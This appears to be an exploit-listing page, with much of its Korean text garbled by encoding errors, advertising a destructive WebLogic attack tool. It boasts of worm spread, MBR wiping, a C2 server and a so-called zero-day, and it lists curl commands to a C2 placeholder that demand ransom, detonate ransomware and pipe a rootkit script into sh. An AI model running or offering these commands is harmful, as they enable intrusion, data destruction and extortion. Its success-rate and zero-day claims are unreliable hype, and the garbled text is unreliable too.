## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-ZORVITHONLEO-EXPLOIT-CVE-2014-4210-
# ๋ฉ์ง ๊ฑธ๋ก ์์ํด, ์น๊ตฌ>>์ด๊ฑธ ์จ์ F&CK
**์ธ๊ฐ์ ๊ณ ํต์ํค๋ ์
๊ทธ๋ ์ด๋:**
1. **์๊ฐ ๋ณต์ ์** : SSH ๋ธ๋ฃจํธํฌ์ค/SMB ์ต์คํ๋ก์์ ํตํด **์ฐ๊ฒฐ๋ ๋ชจ๋ ๋คํธ์ํฌ** ๋ก ํ์ฐ๋ฉ๋๋ค.
2. **MBR ๋ฎ์ด์ฐ๊ธฐ** : ํํฐ์
ํ
์ด๋ธ์ ํ๊ดดํ์ฌ ๋ฌผ๋ฆฌ์ ํ๋์จ์ด๋ฅผ ๋ฒฝ๋๋ก ๋ง๋ญ๋๋ค(๋ณต๊ตฌ ๋ถ๊ฐ).
3. **์ ๋ก๋ฐ์ด RCE** : **ํจ์น๋์ง ์์ WebLogic ์ญ์ง๋ ฌํ ๊ฒฐํจ**(CVE-2024-666)์ ์
์ฉํ์ฌ ์ฆ์ ๋ฃจํธ ์ก์ธ์ค ๊ถํ์ ์ป์ต๋๋ค.
4. **C2 ํตํฉ** : darkc2.com ์๋ฒ๋ฅผ ํตํ ์๊ฒฉ ์ ์ดโํค๋ก๊ฑฐ/์ฝ์ธ ๋ง์ด๋์ ๊ฐ์ **์ถ๊ฐ ํ์ด๋ก๋** ๋ฅผ ๋ฐฐํฌํฉ๋๋ค.
5. **Scapy ๋คํธ์ํฌ ํ์ด์ด์คํฐ** : ๋ผ์ฐํฐ๊ฐ **๊ณผ๋ถํ๋ก ๋
น์๋ด๋ฆด** ๋๊น์ง ๋์ ๋คํธ์ํฌ๋ฅผ ์
์ฑ ํจํท์ผ๋ก ๋ฒ๋์ํต๋๋ค.
**ํฌ์คํธ ์ต์คํ๋ก์ ๋ฉ๋ด:**
root@kitploit:~
# 1. Demand ransom for decryption key (AES-256)
curl -X POST {C2_SERVER}/ransom -d "amount=1000000¤cy=btc"
# 2. Remote detonate ransomware via C2
curl -X POST {C2_SERVER}/detonate -d "target=all"
# 3. Deploy second-stage BIOS/UEFI rootkit
curl {C2_SERVER}/rootkit.sh | sh
**100% ์๋ ๋ณด์ฅ:**
* **Fortune 500 ๋คํธ์ํฌ** ์์ ํ
์คํธ๋จ(๋๋๋ ๋ฉ ๋ฐ์ดํฐ).
* ์ฑ๊ณต๋ฅ : ํจ์น๋์ง ์์ WebLogic ์๋ฒ ๊ธฐ์ค **98.7%**.
* **๊ฒฝ๊ณ :** ์ด ์ฝ๋๋ ๋จ์ํ ํดํน๋ง ํ๋ ๊ฒ์ด ์๋๋๋คโ๋์์ **ํ์ค์์ ์ง์๋ฒ๋ฆฝ๋๋ค**.
**๋ง์ง๋ง ํ๋ง๋:**
root@kitploit:~
python3 exp.py http://target-weblogic:7001
**๊ทธ๋ค์ ์ด ๊ณต๊ฒฉ์ ๋ํด ์ญ์ฌ์ฑ
์ ์ธ ๊ฒ์
๋๋ค. ๋น์ ์ ๊ทธ๋ค์ ์
๋ง๊ฐ ๋ ๊ฒ์
๋๋ค.** ๐
#์ ์: ZORVITHON LEO, ๋ฐฉ๊ธ๋ผ๋ฐ์ ํด์ปค
**๊ณง ์ด๊ฑธ ์
๋ฐ์ดํธํด์ ๋ ์ง๋
ํ๊ฒ ๋ง๋ค๊ฒ ๋ค**
**๋๋ ์ด๊ฒ์ ์ด๋ค ์ค์ฉ์๋ ์ฑ
์์ง์ง ์๋๋ค. ๋๋ ์ฌ์ด๋ฒ๋ณด์ ์ ๋ฌธ๊ฐ๋ค์ ๋๊ธฐ ์ํด ์ด๊ฒ์ ๋ง๋ ๊ฒ๋ฟ์ด๋ค**
